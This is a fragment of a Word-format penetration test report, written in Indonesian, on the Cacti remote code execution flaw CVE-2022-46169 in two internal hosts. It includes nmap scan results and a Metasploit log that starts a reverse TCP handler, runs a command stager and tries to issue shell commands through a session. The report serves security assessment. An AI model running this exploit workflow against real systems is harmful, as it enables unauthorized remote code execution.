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25 June 2024</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Version 1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Introductio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Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Scanned Devices:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- 10.33.102.212: Cacti Detected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- 10.33.102.225: Cacti Detected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Vulnerable Devices:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- 10.33.102.212: CVE-2022-46169 Vulnerability Detected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- 10.33.102.225: CVE-2022-46169 Vulnerability Detected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Pada 25 June 2024, kami melaksanakan uji penetrasi dengan menggunakan pengetahuan sebelumnya tentang lingkungan internal atau dengan menggunakan kredensial yang kami miliki sebelumnya. Tujuannya adalah untuk menemukan kelemahan keamanan dan menguji kemungkinan pengeksploitasian celah tersebut. Pengujian dilakukan secara otomatis dengan menggunakan alat khusus yang dirancang untuk mendeteksi kerentanan CVE-2022-46169 pada Cacti. Kerentanan CVE-2022-46169 merupakan kerentanan eksekusi kode dari jarak jauh pada Cacti. Kerentanan ini terjadi karena adanya kecacatan pada file remote_agent.php. File ini dapat diakses tanpa perlu otentikasi, sehingga dapat dimanfaatkan oleh penyerang untuk melakukan eksekusi kode dari jarak jauh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Scan Target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t># Nmap 7.93 scan initiated Tue Jun 25 12:12:53 2024 as: nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt</w:t>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.212</w:t>
        <w:br/>
        <w:t>Host is up (0.11s latency).</w:t>
        <w:br/>
        <w:t>Not shown: 997 filtered tcp ports (no-response)</w:t>
        <w:br/>
        <w:t>PORT     STATE SERVICE VERSION</w:t>
        <w:br/>
        <w:t>22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)</w:t>
        <w:br/>
        <w:t>80/tcp   open  http    Apache httpd 2.4.54 ((Debian))</w:t>
        <w:br/>
        <w:t>|_http-title: Login to Cacti</w:t>
        <w:br/>
        <w:t>|_http-server-header: Apache/2.4.54 (Debian)</w:t>
        <w:br/>
        <w:t>8086/tcp open  http    InfluxDB http admin 1.6.4</w:t>
        <w:br/>
        <w:t>|_http-title: Site doesn't have a title (text/plain; charset=utf-8).</w:t>
        <w:br/>
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.225</w:t>
        <w:br/>
        <w:t>Host is up (0.098s latency).</w:t>
        <w:br/>
        <w:t>Not shown: 998 filtered tcp ports (no-response)</w:t>
        <w:br/>
        <w:t>PORT   STATE SERVICE VERSION</w:t>
        <w:br/>
        <w:t>22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)</w:t>
        <w:br/>
        <w:t>80/tcp open  http    Apache httpd 2.4.54 ((Debian))</w:t>
        <w:br/>
        <w:t>|_http-title: Login to Cacti</w:t>
        <w:br/>
        <w:t>|_http-server-header: Apache/2.4.54 (Debian)</w:t>
        <w:br/>
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
        <w:br/>
        <w:t># Nmap done at Tue Jun 25 12:13:29 2024 -- 2 IP addresses (2 hosts up) scanned in 36.70 seconds</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitabel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w: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0.2.15</w:t>
        <w:br/>
        <w:t>LHOST =&gt; 10.0.2.15</w:t>
        <w:br/>
        <w:t>resource (exploit_cacti_resource.rc)&gt; exploit -j</w:t>
        <w:br/>
        <w:t>[*] Exploit running as background job 0.</w:t>
        <w:br/>
        <w:t>[*] Exploit completed, but no session was created.</w:t>
        <w:br/>
        <w:t>resource (exploit_cacti_resource.rc)&gt; sleep 20</w:t>
        <w:br/>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 10.0.2.15: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Found exploitable local_data_id 15 for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Command Stager progress - 100.00% done (1118/1118 bytes)</w:t>
        <w:br/>
        <w:t>resource (exploit_cacti_resource.rc)&gt; sessions -i</w:t>
        <w:br/>
        <w:br/>
        <w:t>Active sessions</w:t>
        <w:br/>
        <w:t>===============</w:t>
        <w:br/>
        <w:br/>
        <w:t>No active sessions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>resource (exploit_cacti_resource.rc)&gt; sessions -c 'ls -la' -i 1</w:t>
        <w:br/>
        <w:t>[-] Invalid session identifier: 1</w:t>
        <w:br/>
        <w:t>resource (exploit_cacti_resource.rc)&gt; sleep 10</w:t>
        <w:br/>
        <w:t>resource (exploit_cacti_resource.rc)&gt; exit</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